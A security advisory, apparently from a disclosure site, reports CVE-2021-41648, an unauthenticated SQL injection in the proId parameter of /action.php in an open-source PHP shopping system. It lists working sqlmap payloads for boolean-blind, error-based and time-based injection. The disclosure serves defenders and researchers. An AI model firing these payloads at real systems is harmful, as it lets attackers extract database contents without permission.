PuneethReddyHC Online Shopping System Advanced 1.0 SQL Injection

Credit: Jason Colyvas
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# CVE-2021-41648 CVE-2021-41648 SQL Injection in online-shopping-system The online-shopping-system is vulnerable to un-authenticated error/boolean-based blind & error based SQL Injection attacks. <br/><br/> The proId parameter on the /action.php page does not sanitize the user input, an attacker can extract sensisitive data from the underlying MySQL Database. ## Link To Application [online-shopping-system](https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system) ## Affected Components & Parameter URL: **/action.php** PARAMETER: **proId** ## Poc's ### SQLMAP PAYLOADS<br/> ### proId parameter on the /action.php page Parameter: proId (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: `proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1` Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: `proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1` Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: `proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1`</br></br> ### If the POC Image is unclear, please click on the GIF which will load in a better resolution. ![ POC - proId ](https://github.com/MobiusBinary/F2/blob/main/online-shopping-system.gif) ## Discovered by Jason Colyvas [MOBIUSBINARY](https://mobiusbinary.com) September 21st, 2021

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com


Back to Top